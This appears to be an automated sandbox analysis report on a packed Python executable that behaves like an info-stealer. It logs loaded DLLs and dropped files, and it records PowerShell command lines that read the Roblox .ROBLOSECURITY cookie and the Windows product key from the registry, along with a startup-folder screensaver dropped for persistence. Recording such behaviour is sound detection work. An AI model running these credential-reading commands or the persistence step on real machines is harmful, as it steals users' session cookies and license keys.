              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: program.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: program.exeStatic file information: File size 7954796 > 1048576
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: program.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: \t5.pdbj source: powershell.exe, 0000002A.00000002.1989050806.000001E9C9F48000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: program.exe, 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: program.exe, 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2123042345.00007FFE1A464000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000001.00000002.2117447704.00007FFDFB2D2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2123042345.00007FFE1A464000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.pdbhPE source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2165000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000053.00000000.2004144713.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.pdb source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2165000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000001.00000002.2122070037.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000001.00000002.2121630063.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, 00000001.00000002.2121042650.00007FFE11EA1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: program.exe, 00000001.00000002.2120841650.00007FFE1151B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000001.00000002.2121890288.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000001.00000002.2120841650.00007FFE1151B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000001.00000002.2122536379.00007FFE13301000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, 00000001.00000002.2122251570.00007FFE13201000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120647097.00007FFE0EB41000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000001.00000002.2120375422.00007FFE0E15E000.00000040.00000001.01000000.0000000E.sdmp
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAF10350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF10350
              Source: program.exeStatic PE information: real checksum: 0x7a2451 should be: 0x7a28dd
              Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1cb64b
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f35a
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x46d69
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdba7
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17cae
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa8f8a
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11959
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a226
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1fcc8
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdd74
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x7797
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x21293
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15eca
              Source: tgmup5d5.dll.58.drStatic PE information: real checksum: 0x0 should be: 0x10a05
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAE6AC25 push rcx; ret 1_2_00007FFDFAE6AC62
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00784331 push rcx; ret 1_2_00007FFE00784332
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013427AE push rsp; iretd 1_2_00007FFE013427B9
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0134267D push rbx; retf 1_2_00007FFE01342685
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A3CD2A5 pushad ; iretd 8_2_00007FFD9A3CD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A4E861D push ebx; ret 8_2_00007FFD9A4E863A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A4E863D push ebx; ret 8_2_00007FFD9A4E867A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A4EADE7 push esp; retf 8_2_00007FFD9A4EADE8
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
